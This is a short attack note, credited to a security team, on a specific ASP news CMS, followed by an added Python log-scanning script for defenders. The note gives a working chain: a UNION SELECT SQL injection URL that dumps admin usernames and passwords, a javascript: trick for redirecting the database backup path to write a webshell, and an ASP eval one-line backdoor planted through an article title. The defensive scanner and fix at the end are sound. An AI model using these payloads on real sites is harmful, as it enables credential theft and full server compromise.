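Source: C.Rufus Security Team, by cooldiyer

News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2

In the admin backend, add an article under "Image and Text Management" (图文管理) and upload a flash file. Click the backup/compact database entry in attachment management; its path field is read-only. Open the restore database window and, in IE, enter

javascript:alert(window.frames.document.forms[0].backpath.value="/data/x.asp");

which lets you set a custom path for the webshell.

Alternatively, add an article in the backend with the title <%eval request(chr(120))%> and then visit CreateASP.asp to update the file LastNewsXP.asp; the backdoor is then written into LastNewsXP.asp.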
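For defenders, the request patterns in this note can be searched for in web server logs. The following is an added example, not part of the original note: the log lines, their field order, the IP addresses and the treatment of /data/ as a script-free database directory are all constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample in an assumed IIS W3C field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2009-03-01 10:00:01 198.51.100.7 GET /News.asp click=1&shu=20 200
2009-03-01 10:00:09 203.0.113.5 GET /News.asp click=1&shu=20+1+as+NewsID,username+as+title+from+admin+union+select+top+2 200
2009-03-01 10:02:30 203.0.113.5 GET /CreateASP.asp - 200
2009-03-01 10:03:12 203.0.113.5 GET /data/x.asp x=1 200
"""

NUMERIC_PARAMS = {"click", "shu"}  # News.asp parameters shown in the note
DATA_DIR = "/data/"                # assumption: database directory, never holds scripts


def scan(log_text):
    """Return (client_ip, rule) pairs for requests matching the patterns in the note."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # skip W3C header lines and truncated records
        ip, stem, query = fields[2], fields[4], fields[5]
        path = unquote(stem).lower()
        name = path.rsplit("/", 1)[-1]
        if name == "news.asp":
            # parse_qsl decodes '+' and %xx, so encoded SQL text is checked in clear
            for key, value in parse_qsl(query, keep_blank_values=True):
                if key.lower() in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                    findings.append((ip, "news-param-not-numeric:" + key.lower()))
        if path.startswith(DATA_DIR) and path.endswith(".asp"):
            findings.append((ip, "script-in-data-dir"))
        if name == "createasp.asp":
            # legitimate admin action; review LastNewsXP.asp for "<%" in article titles
            findings.append((ip, "createasp-regeneration"))
    return findings


if __name__ == "__main__":
    for ip, rule in scan(SAMPLE_LOG):
        print(ip, rule)
```

The numeric check on click and shu is also the fix on the application side: News.asp should reject any value for those parameters that is not an integer before it reaches the SQL statement.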